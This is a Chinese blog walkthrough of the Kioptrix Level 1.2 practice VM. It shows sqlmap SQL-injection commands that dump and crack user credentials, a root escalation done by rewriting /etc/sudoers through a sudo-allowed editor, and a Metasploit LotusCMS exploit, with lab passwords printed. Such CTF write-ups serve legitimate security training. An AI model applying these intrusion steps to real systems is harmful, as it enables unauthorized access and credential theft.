OSCP_VULHUB_Hack the Kioptrix Level-1.2

news/2024/10/30 21:21:39/

文章目录

  • 前言
  • 渗透方法论(方法一)
  • 渗透方法论(方法二)
  • 第一种
  • sqlmap扫描&提取数据库和用户凭证
  • ssh登录
  • 使用 SUID 位和 SUDO 二进制文件利用目标
  • 第二种方法
  • searchsploit LotusCMS

前言

Kioptrix 的 CTF 挑战:Level1.2 (#3),这是另一个为练习而提供的 boot2root 挑战。

渗透方法论(方法一)

网络扫描(Nmap、netdiscover)
天翼HTTP服务端口(80)
SQLMAP扫描
提取数据库和用户凭证
使用特定用户通过 SSH 访问目标
使用 SUID 位和 SUDO 二进制文件利用目标
获取 Root 访问权限并捕获标志。

渗透方法论(方法二)

网络扫描(Nmap、netdiscover)
天翼HTTP服务端口(80)
识别易受攻击的 CMS 应用程序的漏洞
通过 Metasploit 利用目标
获取 Root 访问权限并捕获标志。

下载:https://download.vulnhub.com/kioptrix/KVM3.rar

第一种

在这里插入图片描述

在这里插入图片描述
添加etc/hosts
192.168.132.147 kioptrix3.com
在这里插入图片描述

http://kioptrix3.com/gallery/

在这里插入图片描述

sqlmap扫描&提取数据库和用户凭证

http://kioptrix3.com/gallery/gallery.php?id=1
在这里插入图片描述

http://kioptrix3.com/gallery/gallery.php?id=1'

在这里插入图片描述

sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 --dbs –batch

在这里插入图片描述

sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 -T dev_accounts --dump

在这里插入图片描述

5:57:21] [INFO] cracked password 'Mast3r' for user 'dreg'                                         
[15:57:30] [INFO] cracked password 'starwars' for user 'loneferret'  

ssh登录

ssh loneferret@192.168.132.147loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 

在这里插入图片描述

在这里插入图片描述

使用 SUID 位和 SUDO 二进制文件利用目标

在这里插入图片描述
完成后,HT 编辑器将打开

在这里插入图片描述

按 F3 打开文件
在这里插入图片描述

下面是 /etc/sudoers 文件的片段。编辑该文件,以便我们可以不受限制地使用 sudo。

请参阅文件中的以下条目

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

更改前
在这里插入图片描述
更改后
在这里插入图片描述
alt+2保存退出
现在更改用户 loneferret 的条目,如下所示

loneferret ALL=(ALL) NOPASSWD: ALL

重新登录
在这里插入图片描述

更改文件内容后,让我们从用户终端运行 sudo su 命令

loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt 

在这里插入图片描述
在这里插入图片描述

第二种方法

https://www.hackingarticles.in/hack-the-kioptrix-level-1-2-boot2root-chAllenge/

curl –v http://kioptrix3.com/

在这里插入图片描述

在这里插入图片描述

searchsploit LotusCMS

To use this exploit simply type the following in Metasploit:

use exploit/multi/http/lcms_php_exec
set rhost 192.168.1.101
set uri /
exploit

Perform the directory listing and we will observe the gallery folder

ls

Now navigate to the gallery folder and perform the directory listing. Here we can see many files.I browsed through many of these files; of which the file gconfig.php seems to be interesting.

cd gallery
ls

在这里插入图片描述

Now let’s see if we can get some good information from the gconfig.php file

cat gconfig.php

The output of the file shows the credentials for the gallery database

Username :root
Password : fuckeyou

在这里插入图片描述

Let’s perform dirb for the URL http://192.168.132.147/

dirb http://192.168.132.147/
With this, we will get information from many directories as shown in the output below. However, the directory phpmyadmin seems to be quite interesting, as it may have some important information to display

在这里插入图片描述

Browse the URL http://192.168.132.147/phpmyadmin and enter the credentials (received from above)
在这里插入图片描述

Navigate to the gallery database, click on dev_accounts. Then click on the SQL tab and enter the SQL query below. We now have the usernames and password hashes!

在这里插入图片描述

解密cmd5.com

在这里插入图片描述
Mast3r
starwars


http://www.ppmy.cn/news/21398.html

相关文章

《蓝桥杯》30天拿下Python算法设计与分析【Day 13】

做你想做的,错的算我的 这里是Want595,欢迎光临我的世界 ~ 系列文章目录 《蓝桥杯》30天拿下Python算法设计与分析 目录 系列文章目录 前言 0-1背包问题 问题引入 程序设计 完全背包问题 问题引入 程序设计 总结 前言 本文介绍动态规划的…

VR视频加密SDK方案一机一码

VR视频比传统的平面视频给用户带来更好的体验,而且现在在教育、娱乐等领域VR类视频也越来越多。相比传统的视频制作,VR视频的成本要更高,所以重视VR视频的版权保护提升安全性,是很多VR内容制作商不得不考虑的问题。那么VR视频加密…

3D渲染优化入【Three.js】

Three.js 应用程序以每秒 60 帧 (FPS) 的速度执行 3D 渲染是流畅和愉快体验的保证。 然而,这是一个有时难以实现的目标!本文整理了优化 Three.js 应用程序和达到 60 FPS 的最佳提示和技巧! 推荐:使用 NSDT场景编辑器 快速搭建 3D…

SpringBoot(二):配置文件的作用、配置文件的格式、properties配置文件、yml配置文件

目录一、配置文件的作用二、配置文件的格式三、properties配置文件3.1 properties的基本语法3.2 properties的缺点3.3 配置自定义内容3.4 读取配置文件四、yml配置文件4.1 yml基本介绍4.2 yml基本语法4.3 使用yml配置不同的数据类型4.4 读取yml配置文件4.5 在yml中配置对象4.6 …

【Linux】git的使用

文章目录🎪 Linux下git的使用🚀1.git三板斧⭐1.1 准备工作⭐1.2 git add⭐1.3 git commit⭐1.4 git push⭐1.5 筛选提交🚀2.git分区⭐2.1 工作区⭐2.2 暂存区⭐2.3 版本区🚀3.git分支管理⭐3.1 分支创建与切换⭐3.2 分支合并⭐3.3…

Dubbo SPI 源码分析

上一章,我简单演示了 Dubbo SPI 的使用方法。我们首先通过 ExtensionLoader 的 getExtensionLoader 方法获取一个 ExtensionLoader 实例,然后再通过 ExtensionLoader 的 getExtension 方法获取拓展类对象。这其中,getExtensionLoader 用于从缓…

【每日CSS3代码】

1-1 两栏布局【1/27】 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport" content"widthdevi…

数学建模与数据分析 || 3. 面向数据的特征提取方法: 探索性数据分析

面向数据的特征提取方法: 探索性数据分析 文章目录面向数据的特征提取方法: 探索性数据分析1. 原始数据的准备1.1 导入 python 模块1.2 导入数据集并进行宏观认识1.3 数据集描述2. 数据的预处理2.1 缺失数据的甄别2.2 类别规模的评估3. 数据特征的处理3.1 第一个因变量- 分析范…